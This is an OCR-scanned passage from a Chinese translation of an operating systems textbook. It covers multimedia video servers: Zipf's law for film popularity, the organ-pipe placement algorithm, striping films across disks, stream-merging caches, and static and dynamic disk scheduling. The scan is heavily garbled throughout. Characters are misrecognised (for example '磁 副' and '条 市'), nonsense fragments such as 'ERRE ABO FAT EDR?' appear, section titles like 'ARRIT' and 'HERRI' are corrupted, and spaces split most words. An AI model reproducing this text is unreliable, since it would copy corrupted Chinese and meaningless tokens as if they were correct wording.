小 。 然 而 ， 很 有 可 能 发 生 这 样 的 事情 ， 最 大 的 磁道 有 16 个 1 巾 ， 而 第 二 
大 的 磁道 只 有 9 个 I 凑 。 选 择 缓冲 区 的 天 小 能 够 足以 冯 下 第 二 大 的 磁道 可 
能 更 为 明智 。 做 出 这 样 的 选择 意味 着 要 截断 最 大 的 磁道 ， 因 此 对 某 些 
数据 流 将 舍弃 电影 中 的 一 帧 。 为 避免 低频 干扰 ， 前 一 帧 可 以 再 次 显 


示 ， 没 有 人 会 注意 到 这 一 问题 。 


进一步 运用 这 一 方法 ， 如 果 第 三 大 的 磁道 只 有 4 个 巾 ， 使 用 能 够 你 
存 4 个 巾 和 20 个 P 帜 的 缓冲 区 古 值 得 的 。 对 某 些 数据 流 在 电影 中 两 次 引 
入 两 个 重复 的 帧 可 能 是 可 以 接受 的 。 这 样 做 下 去 何 处 有 古 尖 呢 ? 也 许 是 
组 促 区 大 小 对 于 99% 的 帧 而 襄 足 够 大 束 行 了 。 显 然 ， 在 绥 冲 区 使 用 的 内 
存 和 电影 的 质量 之 间 存 在 着 权衡 。 注 意 ， 同 时 存在 的 数据 流 越 多 ， 统 
计数 据 束 越 好 并 且 帆 集合 也 越 均 实 。 


7.7.4 ”在 单个 磁盘 上 存放 多 个 文件 


到 目前 为 止 我 们 还 只 考虑 了 单 部 电影 的 存放 。 在 视频 服务 器 上 ， 
当然 存在 着 许多 电影 。 如 条 它 们 随机 地 散布 在 磁 弄 上 ， 那 么 当 多 部 电 
影 被 不 同 的 客户 同时 观看 时 ， 时 间 将 浪费 在 磁头 在 电影 之 间 来 回 移动 
be 


通过 观察 到 某 些 电影 比 其 他 电影 更 为 流行 并 且 在 磁盘 上 存放 电影 
时 将 流行 性 考虑 进去 ， 可 以 改进 这 一 情况 。 尽 管 总 的 来 说 有 天 个 别 电 
影 的 流行 性 并 没有 多 少 可 说 的 《除了 有 大 腕 明星 似乎 有 所 帮助 以 
外 ) ， 但 是 大 体 上 关于 电影 的 相对 流行 性 总 还 是 可 以 说 出 一 些 规律 。 


行 
行 


对 于 许多 种 类 的 流行 性 比赛 ， 诸 如 出 租 的 电影 、 从 图 书馆 借 出 的 
图 书 、 访 问 的 Web 网 页 ， 甚 至 一 部 小 说 中 使 用 的 英文 单词 或 者 特大 城市 
居住 的 人 口 ， 相 对 流行 性 的 一 个 合理 的 近似 遵循 着 一 种 令 人 惊奇 的 可 
预测 模式 。 这 一 模式 是 哈佛 大 学 的 一 位 语言 学 教授 George Zipf (1902- 
1950) 发 现 的 ， 现 在 被 称 为 Zipf 定 律 。 该 定律 说 的 是 ， 如 采 电影 、 岁 
书 、Web 网 页 或 者 单词 按 其 流行 性 进行 排名 ， 那 么 下 一 个 客户 选择 排行 
榜 中 排名 为 k 的 项 的 概率 是 Clk， 其 中 C 是 一 个 归 一 化 常数 。 


因而 ， 前 三 部 电影 的 命中 率 分 别 是 C/1、C/2 和 C/3， 其 中 C 的 计算 
要 使 全 部 项 的 和 为 1。 换 句 话说， 如 果 有 N 部 电影 ， 那 么 


C/1+C/2+C/3+C/4+...+C/N=1 


从 这 一 公式 ，C 可 以 被 计算 出 来 。 对 于 具有 10 个 、100 个 、1000 个 


如 ， 对 于 1000 部 电影 
0.034 和 0.027 。 


和 10 000 个 项 的 总 体 ，C 的 值 分 别 是 0.341、0.193、0.134 和 0.102。 例 


前 5 部 电影 的 概率 分 别 是 0.134、0.067、0.045、 


图 7-22 说 明了 Zipf 定 律 。 只 是 为 了 娱乐 ， 该 定律 被 应 用 于 美国 20 座 
最 大 城市 的 人 口 。Zipf 定 律 预 测 第 二 大 城市 应 该 具有 最 大 城市 一 半 的 人 


口 ， 第 三 大 城市 应 该 具有 最 大 城市 三 分 之 一 的 人 口 ， 以 此 类 推 。 虽 然 
不 尽 完美 ， 该 定律 令 人 惊奇 地 吻合 。 
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图 7-22 当 N=20 时 的 Zipf 定 律 曲 线 。 方 块 表 示 美 国 20 座 最 大 城市 的 人 
口 ， 按 排名 顺序 排列 (纽约 第 一 、 洛 杉 矶 第 二 、 芝 加 哥 第 三 等 ) 


对 于 视频 服务 器 上 的 电影 而 言 ，Zipf 定 律 表 明 最 流行 的 电影 被 选择 
的 次 数 是 第 二 流行 的 电影 的 两 倍 ， 是 第 三 流行 的 电影 的 三 倍 ， 以 此 类 
推 。 尽 管 分 布 在 开始 时 下 降 得 相当 快 ， 但 是 它 有 着 一 个 长 长 的 尾部 。 
例如 ， 排 名 50 的 电影 拥有 C/50 的 流行 性 ， 排 名 51 的 电影 拥有 C/51 的 流 
行 性 ， 所 以 排名 51 的 电影 的 流行 性 是 排名 50 的 电影 的 50/51， 只 有 大 约 
2% 的 差额 。 随 着 尾部 进一步 延伸 ， 相 邻 电影 间 的 百分比 差额 变 得 越 来 
越 小 。 一 个 结论 就 是 ， 服 务 器 需要 大 量 的 电影 ， 因 为 对 于 前 10 名 以 外 
的 电影 存在 着 潜在 的 需求 。 


了 解 不 同 电影 的 相对 流行 性 ， 使 得 对 视频 服务 器 的 性 能 进行 建 模 
以 及 将 该 信息 应 用 于 存放 文件 成 为 可 能 。 研 究 已 经 表明 ， 最 佳 的 策略 
令 人 惊奇 地 简单 并 且 独 立 于 分 布 。 这 一 策略 称 为 管风琴 算法 (organ- 
pipe algorithm) (Grossman 利 Silverman,1973;Wong,1983) 。 该 算法 将 
最 流行 的 电影 存放 在 磁 副 的 中 央 ， 第 二 和 第 三 流行 的 电影 存放 在 最 流 
行 的 电影 的 两 边 ， 在 这 几 部 电影 的 外 边 是 排名 第 四 和 第 五 的 电影 ， 以 
此 类 推 ， 如 图 7-23 所 示 。 如 果 每 一 部 电影 是 如 图 7-19 所 示 类 型 的 连续 文 
件 ， 这 样 的 存放 方式 工作 得 最 好 ; 如 果 每 一 部 电影 被 约束 在 一 个 狭 腔 
的 柱 面 范 围 之 内 ， 这 样 的 存放 方式 也 可 以 扩大 其 使 用 的 范围 。 该 算法 


| 


的 名 字 来 目 这 样 的 事实 一 一 概率 直方 图 看 起 来 像 古 一 个 稍稍 不 对 称 的 


使 用 频率 — 


该 算法 所 做 的 是 试图 将 磁头 保持 在 磁 副 的 中 央 。 当 服务 器 上 的 电 
影 有 1000 部 时 ， 根 据 Zipf 定 律 分 布 ， 排 在 前 5 名 的 电影 代表 了 0.307 的 总 
概率 ， 这 意味 着 大 约 30% 的 时 间 人 磁头 停留 在 为 排 在 前 5 名 的 电影 分 配 的 
柱 面 中 ， 如 果 有 1000 部 电影 可 用 ， 这 是 一 个 惊人 的 数量 。 


7.7.5 ”在 多 个 做 盘 上 存放 文件 


为 了 获得 更 高 的 性 能 ， 视 频 服务 器 经 常 拥有 可 以 并 行 运转 的 很 多 
磁盘。RAID 有 时 会 被 用 到 ， 但 是 通常 并 不 是 因为 RAID 以 性 能 为 代价 
提供 了 更 高 的 可 靠 性 。 视 频 服务 器 通常 希望 高 的 性 能 而 对 于 校正 传输 
背 误 不 怎么 太 关心 。 除 此 之 外 ， 如 果 RAID 控 制 器 有 太 多 的 磁盘 要 同时 
处 理 ， 那 么 RAID 探 制 右 可 能 会 成 为 一 个 上 瓶颈。 


更 为 普通 的 配置 只 下 数目 很 多 的 磁盘 ， 有 时 被 称 为 磁盘 园 (disk 
farm) 。 这 些 磁盘 不 像 RAID 那 样 以 同步 方式 旋转 ， 也 不 像 RAID 那 样 包 
人 台 奇 偶 校 验 位 。 一 种 可 能 的 配置 是 将 电影 A 存 放 在 磁 列 1 上 ， 将 电影 B 
存放 在 磁盘 2 上 ， 以 此 类 推 ， 如 图 7-24a 所 示 。 实 际 上 ， 使 用 新 式 的 磁 
盘 ， 每 个 磁盘 上 可 以 存放 者 干部 电影 。 
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图 7-24 在 多 个 磁盘 上 组 织 多 媒体 文件 的 四 种 方式 : a 无 条 市 b) 所 
有 文件 采用 相同 的 条 市 模式 ，o) 区 氏 条 市 d) 随 机 条 市 


这 一 组 织 方式 实现 起 来 很 简单 ， 并 且 具 有 人 簿 单 明 了 的 故障 特性 : 
如 有 果 一 块 磁盘 发 生 故 障 ， 其 上 的 所 有 电影 都 将 不 再 可 用 。 注 意 ， 一 家 
公司 损失 了 一 块 竣 满 了 电影 的 位 强 并 没有 一 家 公司 损失 了 一 块 冯 满 了 
数据 的 磁 副 那么 精 料 ， 因 为 电影 还 可 以 从 DVD 重 新 装载 到 一 块 空 几 的 
人 磁盘 中 。 这 一 方法 的 缺点 是 负载 可 能 没有 很 好 地 平衡 ， 如 来 某 些 倍 副 
ERRE ABO FAT EDR? TM Sb a EY ce BAIT 
的 电影 ， 则 系统 就 没有 被 充分 利用 。 当 然 , 一 旦 知道 了 电影 的 使 用 频 
率 ， 那 么 手工 移动 某 些 电影 以 平衡 负载 也 是 可 能 的 。 


第 二 种 可 能 的 组 织 方式 是 将 每 一 部 电影 在 多 块 磁盘 上 分 成 条 带 ， 
图 7-24b 所 示 为 4 部 电影 的 例子 。 让 我 们 暂时 假设 所 有 的 帧 大 小 相同 (也 
就 是 未 压缩 ) 。 固 定 的 字 市 数 从 电影 A 写 入 磁盘 1， 然 后 相同 的 字 市 数 
写 入 磁盘 2， 直 到 到 达 最 后 一 块 磁盘 (在 本 例 的 情形 中 是 A3 单 元 。 然 
后 ， 再 次 在 第 一 块 人 磁盘 处 继续 分 条 市 操作 ， 写 入 A4 单 元 ， 这 样 进行 下 
去 直到 整个 文件 被 写 完 。 电 影 B、C 和 D 以 同样 的 模式 分 成 条 带 。 


由 于 所 有 的 电影 在 第 一 块 磁盘 开始 ， 这 一 条 市 模式 的 一 个 可 能 的 
缺点 征 跨 位 一 的 负载 可 能 不 平衡 。 一 种 更 好 地 分 散 负 载 的 方法 是 交错 
起 始 人 砚 副 ， 如 图 7-24c 所 示 。 还 有 一 种 试图 平衡 负载 的 方法 是 对 每 一 文 
件 使 用 随机 的 条 市 模式 ， 如 图 7-24d 所 示 。 


到 目前 为 止 ， 我 们 一 直 假 设 所 有 的 帧 大 小 相同 ， 而 对 于 MPEG-2 电 
影 ， 这 一 假设 是 错误 的 : 其 比 P 帧 要 大 得 多 。 有 两 种 方法 可 以 处 理 这 
一 新 出 现 的 问题 : 按 帧 分 条 带 或 按 块 分 条 带 。 按 帧 分 条 融 时 ， 电 影 A 的 
第 一 帧 作为 连续 的 单位 存放 在 磁盘 1 上 ， 不 管 它 有 多 大 。 下 一 帧 存放 在 
人 磁 姐 2 上 ， 以 此 类 推 。 电 影 B 以 类 似 的 方式 分 条 市 ， 或 者 在 同一 块 磁 副 
上 开始 ， 或 者 在 下 一 块 磁盘 上 开始 《如果 是 交错 条 带 ) ， 或 者 是 在 随 
机 的 一 块 磁 盖 上 开始 。 因 为 每 次 读 入 一 帆 ， 这 一 条 市 形式 并 没有 加 快 
任何 给 定 电 影 的 读 入 ， 然 而 它 比 图 7-24a 更 好 地 在 磁 副 间 分 散 了 负载 ， 
如 果 有 许多 人 决定 今 晚 观 看 电影 A 而 没有 人 想 看 电影 C， 图 7-24a 的 表现 
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盘 市 宽 ， 并 因此 而 增加 能 够 服务 的 顾客 数目 。 


分 条 带 的 另 一 种 方法 是 按 块 分 条 带 。 对 于 每 部 电影 ， 固 定 大 小 的 
单元 连续 (或 随机 ) 写 到 每 块 磁 副 上 “。 每 个 块 包含 一 个 或 多 个 帧 或 者 
其 中 的 碎片 。 对 于 同一 部 电影 ， 系 统 现在 可 以 发 出 对 多 个 块 的 请 求 ， 
每 个 请 求 要 求 读数 据 到 不 同 的 内 存 缓 冲 区 ， 但 是 以 这 样 的 方式 ， 当 所 
有 的 请 求 都 完成 时 ， 一 个 连续 的 电影 片断 (GAS) TEA 
被 连续 地 组 装 好 。 这 些 请 求 可 以 并 行 处 理 。 当 最 后 一 个 请 求 被 满足 
时 ， 可 以 用 信号 通知 请 求 进程 工作 已 经 完成 了 ， 此 时 它 就 可 以 将 数据 
传送 给 用 户 。 许 多 帧 过 后 ， 当 缓冲 区 下 降 到 最 后 几 帧 时 ， 更 多 的 请 求 
将 被 发 出 ， 以 便 预 装载 另外 一 个 缓冲 区 。 这 一 方法 使 用 了 大 量 的 内 存 
作为 缓冲 区 ， 从 而 使 磁盘 保持 忙碌 。 在 一 个 具有 1000 个 活跃 用 户 和 
1MB 缓 种 区 的 系统 上 〈 例 如 ， 在 4 块 磁 副 中 的 每 块 上 使 用 256KB 的 磁盘 
H) ， 将 需要 1GB 的 RAM 作 为 缓冲 区 。 在 1000 个 用 户 的 服务 器 上 ， 这 
样 的 内 存 用 量 只 是 “小 意思 >， 应 该 不 会 有 问题 。 


天 于 条 市 的 最 后 一 个 问题 是 在 多 少 个 仙 副 上 分 条 市 。 在 一 个 极 
端 ， 每 部 电影 将 在 所 有 的 磁盘 上 分 成 条 带 。 例 如 ， 对 于 2GB 的 电影 和 
1000 块 磁 副 ， 可 以 将 2MB 的 磁盘 块 写 在 每 块 位 二 上 ， 这 样 束 没有 电影 
两 次 使 用 同一 块 磁盘 。 在 男 一 个 极端 ， 人 磁盘 被 分 区 为 小 的 组 (如 同 图 7- 
24 那 样 ) ， 并 且 每 部 电影 被 限制 在 一 个 分 区 中 。 前 者 称 为 宽 条 认 


(wide striping) ， 它 在 平衡 磁 副 间 负 载 方面 工作 良好 。 它 的 主要 问题 
征 每 部 电影 使 用 了 所 有 磁盘 ， 如 果 一 块 磁 强 出 现 故 障 ， 那 么 就 没有 电 
影 可 以 观看 了 。 后 者 称 为 窗 条 带 (narrow striping) ， 它 将 遭遇 热点 

( 广 受 欢迎 的 分 区 ) 的 问题 ， 但 是 损失 一 块 磁盘 将 只 是 葬送 存放 在 其 
分 区 中 的 电影 。 对 于 可 变 大 小 帧 的 划分 条 带 ，Shenoy 和 Vin (1999) 在 
数学 上 进行 了 详细 的 分 析 。 


7.8 ARRIT 


传统 的 LRU 文 件 高 速 缓存 对 于 多 媒体 文件 而 言 工作 得 并 不 好 ， 这 
征 因 为 电影 的 访问 模式 与 文本 文件 有 所 不 同 。 在 传统 的 LRU 缓 冲 区 高 
速 缓存 背后 的 思想 是 ， 当 一 个 块 被 使 用 之 后 ， 应 该 将 其 保存 在 高 速 组 
存 中 ， 以 防 很 快 再 次 需要 访问 它 。 例 如 ， 在 编辑 一 个 文件 的 时 候 ， 文 
件 被 写 入 的 一 组 磁 副 块 很 可 能 反复 地 被 用 到 ， 直 到 编辑 过 程 结 束 。 换 
言 之 ， 如 有 果 一 个 磁盘 块 在 短暂 的 时 间 间 隔 内 存在 比较 高 的 可 能 性 要 被 
重用 的 话 ， 它 就 值得 保存 在 高 速 缓存 之 中 ， 以 免 将 来 对 和 磁 表 的 访问 。 


对 于 多 媒体 而 言 ， 通 常 的 访问 模式 是 按 顺序 从 头 到 尾 观看 一 部 电 
影 。 一 个 块 不 太 可 能 被 使 用 两 次 ， 除 非 用 户 对 电影 进行 倒 市 操作 以 再 
次 观看 某 一 场景 。 因 此 ， 通 常 的 高 速 绥 存 技术 是 行 不 通 的 。 然 而 ， 高 
速 缓 存 仍 然 是 可 以 有 帮助 的 ， 只 不 过 是 要 以 不 同 的 方式 使 用 。 在 下 面 
几 小 方 ， 我 们 来 看 一 看 适用 于 多 媒体 的 高 速 缓存 技术 。 


7.8.1 HERRI 


尽管 只 是 将 一 个 块 保存 起 来 期 望 它 可 能 很 快 再 次 被 用 到 是 没有 意 
义 的 ， 但 是 可 以 利用 多 媒体 系统 的 可 预测 性 ， 使 高 速 缓存 再 度 成 为 十 
分 有 益 的 技术 。 假 设 两 个 用 户 正在 观看 同一 部 电影 ， 其 中 一 个 用 户 在 
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给 定 的 块 之 后 ， 很 有 可 能 第 二 个 用 户 在 2 秒 钟 后 将 需要 相同 的 块 。 系 统 
很 容易 跟 踩 哪些 电影 只 有 一 个 观众 ， 哪 些 电影 有 两 个 或 更 多 个 在 时 间 
上 上 相隔 很 近 的 观众 。 


因此 ， 只 要 一 部 电影 中 的 一 个 块 读 出 后 很 快 会 再 次 需要 ， 对 其 进 
行 高 速 级 存 束 是 有 意义 的 ， 当 然 是 否 进行 高 速 缓 存 还 取决 于 它 要 被 高 
速 缓存 多 长 时 间 以 及 内 存 有 多 紧张 。 这 里 应 该 使 用 不 同 的 集 上 略 ， 而 不 
是 将 所 有 磁盘 块 保留 在 高 速 绥 存 之 中 并 且 在 高 速 绥 存 人 被 填 满 之 后 淘汰 
最 近 最 少 使 用 的 。 对 于 在 第 一 个 观众 之 后 AT 时 间 之 内 有 第 二 个 观众 的 
每 一 部 电影 ， 可 以 将 其 标记 为 可 高 速 缓存 的 ， 并 且 高 速 缓存 其 所 有 磁 
盘 块 直到 第 二 个 观众 (也 可 能 是 第 三 个 观众 ) 使 用 。 对 于 其 他 的 电 
影 ， 根 本 不 需要 进行 高 速 缓存 。 


这 一 思想 还 可 以 进一步 发 挥 。 在 某 些 情况 下 合并 两 个 视频 流 是 可 
行 的。 假设 两 个 用 户 正 在 观看 同一 部 电影 ， 但 是 在 两 个 用 户 之 间 存 在 
10 秒 钟 的 延迟 。 在 高 速 缓存 中 保留 10 秒 钟 的 磁盘 块 是 有 可 能 的 ， 但 是 
要 少 费 内 存 。 一 种 奉 代 的 方法 是 试图 使 两 部 电影 同步 ， 这 一 方法 可 以 
通过 改变 两 部 电影 的 帧 率 实 现 ， 图 7-25 演 示 了 这 一 思想 。 


10 秒 钟 1 分 钟 2 分 钟 3 分钟 4 分 钟 


开始 晚 4 BE 一 
10 秒 a) 
较 慢 播放 正常 速度 
A ia i 


较 快 播放 正常 速度 


图 7-25 a) 两 个 用 户 观 看 失 步 10 秒 钟 的 同一 部 电影 ;，b) 将 两 个 视频 流 
合并 为 一 个 


在 图 7-25a 中 ， 两 部 电影 均 以 每 分 钟 1800 帧 的 NTSC 速 率 播放 ， 由 于 
用 户 2 开始 晚 了 10 秒 钟 ， 他 将 在 整 部 电影 播放 过 程 中 落后 10 秒 钟 。 然 
而 ， 在 图 7-25b 中 ， 当 用 户 2 到 来 时 ， 用 户 1 的 视频 流 将 放 慢 ， 在 接 下 来 
的 3 分 钟 里 ， 它 不 是 以 每 分 钟 1800 帧 的 速率 播放 ， 而 是 以 每 分 钟 1750 帧 
的 速率 播放 ，3 分 钟 后 ， 它 正 处 于 第 5550 帧 。 与 此 同时 ， 用 户 2 的 视频 
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处 于 第 5550 帧 。 从 此 刻 之 后 ， 两 个 视频 流 均 以 正 稼 速度 播放 。 


在 追赶 阶段 ， 用 户 1 的 视频 流 运行 速度 慢 了 2.8%， 而 用 户 2 的 视频 
流 运行 速度 快 了 2.8%。 用 户 不 太 可 能 会 注意 到 这 一 点 。 然 而 ， 如 采 对 
此 有 所 担心 ， 那 么 退 赶 阶段 可 以 在 比 3 分 钟 更 长 的 时 间 间 隅 上 展开 。 


一 种 降低 一 个 用 户 的 速度 以 便 与 另 一 个 视频 流 合并 的 可 选 方法 
是 ， 给 用 户 以 在 他 们 的 电影 中 包含 广告 的 选项 ， 与 无 广告 的 电影 相 
比 ， 其 观看 价格 比较 低 。 用 户 还 可 以 选择 产品 门类 ， 这 样 广告 的 侵扰 
就 会 小 一 些 而 更 有 可 能 被 观看 。 通 过 对 广告 的 数目 、 长 度 和 时 间 安 排 
进行 巧妙 的 操作 ， 视 频 流 就 可 以 被 阻 滞 足 够 长 的 时 间 ， 以 便 与 期 望 的 
视频 流 取得 同步 (Krishnan, 1999) 。 


7.8.2 ”文件 高 速 缓存 


在 多 媒体 系统 中 高 速 缓存 还 能 够 以 不 同 的 方式 提供 帮助 。 由 于 大 
多 数 电 影 都 非常 大 (3~6GB) ， 视 频 服务 器 通常 不 能 在 磁盘 上 存放 所 
有 这 些 文件 ， 所 以 要 将 它们 存放 在 DVD 或 磁带 上 。 当 需要 一 部 电影 的 
时 候 ， 它 总 是 可 以 被 复制 到 磁 一 上 ， 但 是 存在 大 量 的 局 动 时 间 来 查找 
电影 并 将 其 复制 到 磁盘 上 。 因此， 大 多 数 视 频 服务 紫 维 护 着 一 个 请 求 
最 频 楷 的 电影 的 磁盘 高 速 缓存 。 流 行 的 电影 将 完整 地 存放 在 磁 一 上 。 
使 用 高 速 缓存 的 丸 一 种 方法 是 在 磁 副 上 保存 每 部 电影 的 最 初 几 分 钟 。 
这 样 ， 当 一 部 电影 被 请 求 时 ， 可 以 立刻 从 磁 强 文件 开始 回放 ， 与 此 同 
时 ， 电 影 从 DVD 或 位 冲 复 制 到 磁 副 上 “。 通 过 始终 在 磁 副 上 存放 电影 
够 长 的 部 分 ， 电 影 的 下 一 个 片断 在 它 需要 之 前 就 已 经 取 到 磁盘 上 的 概 
率 会 很 高 。 如果 一 切 都 进行 得 很 好 ， 整 部 电影 将 在 它 需 要 之 前 就 已 经 
在 做 一 上 了 ， 人 然后 它 将 进入 高 速 缓存 并 且 停留 在 磁盘 上 以 备 随后 有 更 
多 的 请 求 。 如 果 太 多 的 时 间 过 去 而 没有 另外 的 请 求 ， 电 影 将 从 高 速 组 
存 中 删除 ， 以 便 为 更 为 流行 的 电影 腾 出 空间 。 
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多 媒体 对 磁 强 提出 了 与 传统 的 、 面 回 文 本 的 应 用 程序 (例如 编译 
器 或 字 处 理 器 ) 有 所 不 同 的 要 求 。 特 别 是 ， 多 媒体 要 求 极 高 的 数据 率 
和 数据 的 实时 传输 。 这 些 部 不 十 轻 易 束 能 够 提供 的 。 此 外 ， 在 视频 服 
务 器 的 情形 中 ， 让 一 个 服务 器 同时 处理 几 千 个 客户 还 存在 着 经 济 压 
力 。 这 些 需 求 影响 着 整个 系统 。 上 面 我 们 了 解 了 文件 系统 ， 现 在 让 我 
们 来 看 一 看 多 媒体 位 副 调 度 。 


7.9.1 静态 做 盘 调度 


尽管 多 媒体 对 系统 的 所 有 部 分 提出 了 巨大 的 实时 和 数据 率 要 求 ， 
但 是 它 还 有 一 个 特性 使 其 比 传统 的 系统 更 加 容易 处 理 ， 这 融 是 可 预测 
性 。 在 传统 的 操作 系统 中 ， 对 磁盘 块 的 请 求 是 以 相当 不 可 预测 的 方式 
发 出 的 。 磁 盘子 系统 所 能 做 的 最 好 不 过 是 对 于 每 个 打开 的 文件 执行 一 
个 磁 副 块 的 预 恋 ， 除 此 之 外 ， 它 能 够 做 的 全 部 事情 束 是 等 待 请 求 的 到 
来 ， 并 且 在 请 求 时 对 它们 进行 处 理 。 多 烁 体 束 不 同 了 ， 每 个 活动 的 视 
频 流 对 系统 施加 明确 的 负载 ， 使 系统 成 为 高 度 可 预测 的 。 就 NTSC 回 放 
而 言 ， 每 33.3ms， 每 个 客户 将 需要 其 文件 中 的 下 一 帧 ， 并 且 系 统 
33.3ms 的 时 间 提 供 所 有 的 帧 《系统 对 每 个 视频 流 需要 缓冲 至 少 一 帧 ， 
所 以 取 第 k+1 帧 可 以 与 第 k 帧 的 回放 并 行 处 理 ) 。 
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调度 。 下 面 我 们 将 只 考虑 一 个 磁盘 ， 但 是 其 思想 也 可 以 运用 于 多 个 位 
盘 。 束 这 个 例子 而 言 ， 我 们 将 假设 存在 10 个 用 户 ， 每 个 用 户 观 看 不 同 
的 电影 。 此 外 ， 我 们 还 将 假设 所 有 的 电影 具有 相同 的 分 辨 率 、 帆 率 和 
其 他 符 性 。 


根据 系统 的 其 他 部 分 ， 计 算 机 可 能 有 10 个 进程 ， 每 个 视频 流 一 个 
进程 ， 或 者 有 一 个 具有 10 个 线程 的 进程 ， 或 者 甚至 只 有 一 个 具有 一 个 
线程 的 进程 ， 以 轮转 方式 处 理 10 个 视频 流 。 细 节 并 不 重要 ， 重 要 的 
是 ， 时 间 被 分 割 成 回环 (round) ， 在 这 里 一 个 回环 是 一 帧 的 时 间 (对 
于 NTSC 是 33.3ms， 对 于 PAL 是 40ms) 。 在 每 一 回环 的 开始 ， 为 每 个 用 
户 生 成 一 个 磁盘 请 求 ， 如 图 7-26 所 示 。 


视频 流 


奇数 帧 的 缓冲 区 
偶数 帧 的 缓冲 区 


请 求 的 磁 得 块 701 92 281 130 326 410 160 466 204 524 


| 优化 算法 


92 130 160 204 281 326 410 466 524 701 
磁盘 请 求 被 处 理 的 顺序 一 一 ~ 


图 7-26 在 一 个 回环 中 ， 每 部 电影 请 求 一 由 


在 回环 的 起 始 处 ， 当 所 有 的 请 求 都 进来 之 后 ， 磁 盘 束 会 知道 在 那 
个 回环 期 间 它 必须 做 什么 ， 它 还 知道 直到 处 理 完 这 些 请 求 并 且 下 一 个 
回环 开始 ， 不 会 有 其 他 的 请 求 进来 。 因此， 它 能 够 以 优化 的 方法 对 请 
求 排序 ， 可 能 是 以 柱 面 顺序 (可 以 想象 在 某 些 情形 也 可 能 以 局 区 顺 
Fe) 排序 ， 然 后 以 优化 的 顺序 对 它们 进行 处 理 。 在 图 7-26 中 ， 显 示 的 请 
求 是 以 柱 面 顺序 排序 的 。 


乍 一 看 ， 人 们 可 能 会 认为 以 这 样 的 方式 优化 磁 副 没有 什么 价值 ， 
因为 只 要 磁 僵 满足 最 终 时 限 ， 那 么 它 是 以 Ims 的 主 余 满足 还 是 以 10ms 的 
富余 满足 并 没有 什么 关系 。 然 而 ， 这 一 绪论 是 错误 的 。 通 过 以 这 样 的 
方式 优化 寻 道 ， 处 理 每 一 请 求 的 平均 时 间 就 缩短 了 ， 这 意味 着 一 般 来 
说 每 一 回环 磁 副 可 以 处 理 更 多 的 视频 流 。 换 名 话说 ， 像 这 样 优化 磁 表 
请 求 增加 了 服务 器 可 以 同时 传送 的 电影 数 。 回 环 末 尾 的 证 余 时 间 还 可 
以 用 来 服务 可 能 存在 的 任何 非 实 时 请 求 。 


如 有 条 服务 邵 有 太 多 的 视频 流 ， 偶 尔 也 会 出 现 当 要 求 从 磁盘 的 边缘 
部 分 读 取 帧 时 错过 了 最 终 时 限 的 情况 。 但 是 ， 只 要 错过 最 终 时 限 的 情 
况 足 够 稀少 ， 以 此 换取 同时 处 理 更 多 的 视频 流 还 是 可 以 容 航 的 。 注 
意 ， 要 紧 的 是 读 取 的 视频 流 的 数目 ， 每 个 视频 流 有 两 个 或 更 多 个 客户 
并 不 影响 磁盘 性 能 或 调度 。 


为 了 保持 输出 给 客户 的 数据 流 运行 流畅 ， 在 服务 邵 中 采用 双 缓 冲 
是 必 要 的 。 在 第 1 个 回环 期 间 ， 使 用 一 组 缓冲 区 ， 每 个 视频 流 一 个 缓冲 


区 。 在 这 个 回环 结束 的 时 候 ， 输 出 进程 或 进程 组 被 解除 阻塞 并 且 被 告 
知 传输 第 1 帆 。 与 此 同时 ， 新 的 请 求 进来 请 求 每 部 电影 的 第 2 帧 (每 部 
电影 或 许 有 一 个 磁盘 线程 和 一 个 输出 线程 ) 。 这 些 请 求 必须 用 第 二 组 
绥 促 区 来 满足 ， 因 为 第 一 组 绥 冲 区 仍然 在 忙碌 中 。 当 第 3 个 回环 开始 的 
时 候 ， 第 一 组 绥 冲 区 已 经 空 几 ， 可 以 重新 用 来 读 取 第 3 帧 。 


我 们 一 直 在 假设 每 一 帧 只 有 一 个 回环 ， 这 一 限制 并 不 是 严格 必需 
的 。 每 一 帧 也 可 以 有 两 个 回环 ， 以 便 减少 所 需 绥 促 区 空间 的 数量 ， 其 
代价 是 磁 副 操作 的 次 数 增加 了 一 售 。 类 似 地 ， 每 一 回环 可 以 从 磁盘 中 
读 取 两 帧 〈 假 设 一 对 帧 连续 地 存放 在 磁盘 上 ) 。 这 一 设计 将 磁盘 操作 
的 数目 减少 了 一 半 ， 其 代价 是 所 需 缓冲 区 空间 的 数量 增加 了 一 倍 。 依 
靠 相 对 可 利用 率 、 性 能 和 内 存 绵 用 与 磁盘 WO 的 对 比 ， 可 以 计算 并 使 用 
优化 策略 。 


7.9.2 ”动态 做 盘 调度 


在 上 面 的 例子 中 ， 我 们 假设 所 有 的 视频 流 具 有 相同 的 分 辨 率 、 帧 
率 和 其 他 特性 ， 现 在 让 我 们 放弃 这 一 假设 。 不 同 的 电影 现在 可 能 具有 
不 同 的 数据 率 ， 所 以 不 可 能 每 33.3ms 有 一 个 回环 并 且 为 每 个 视频 流 读 
取 一 帧 。 对 磁 副 的 请 求 或 多 或 少 是 随机 到 来 的 。 


每 一 读 请 求 需要 指定 要 读 的 是 哪 一 磁盘 块 ， 另 外 还 要 指定 什么 时 
间 和 需要 该 磁盘 块 ， 也 就是 最 终 时 限 。 为 简单 起 见 ， 我 们 假设 对 于 每 次 
请 求实 际 的 服务 时 间 是 相同 的 (尽管 这 肯定 是 不 真实 的 ) 。 以 这 种 方 
法 ， 我 们 可 以 从 每 次 请 求 减 去 固定 的 服务 时 间 ， 得 到 请 求 能 够 发 出 并 
且 还 能 满足 最 终 时 限 的 最 近 的 时 间 。 因 为 磁盘 调度 程序 所 关心 的 是 对 
请 求 进行 调度 的 最 终 时 限 ， 所 以 这 样 做 使 模型 更 为 简洁 。 


当 系 统 局 动 的 时 候 ， 还 没有 挂 起 的 磁盘 请 求 。 当 第 一 个 请 求 到 来 
的 时 候 ， 它 立即 得 到 服务 。 当 第 一 次 寻 道 发 生 的 时 候 ， 其 他 请 求 可 能 
到 来 ， 所 以 当 第 一 次 请 求 结束 的 时 候 ， 人 磁盘 张 动 硕 可 能 要 选择 下 一 次 
处 理 哪个 请 求 。 某 个 请 求 被 选中 并 开始 得 到 处 理 。 当 该 请 求 结束 的 时 
候 ， 再 一 次 有 一 组 可 能 的 请 求 : 它们 是 第 一 次 没有 被 选中 的 请 求 和 第 
二 个 请 求 正 在 被 处 理 的 时 候 新 到 来 的 请 求 。 一 般 而 言 ， 只 要 一 个 磁盘 
请 求 完成 ， 位 组 驱动 右 束 有 奋 干 组 挂 起 的 请 求 ， 必 须 从 中 做 出 选择 。 
问题 是 : “使 用 什么 算法 选择 下 一 个 要 服务 的 请 求 ? ” 
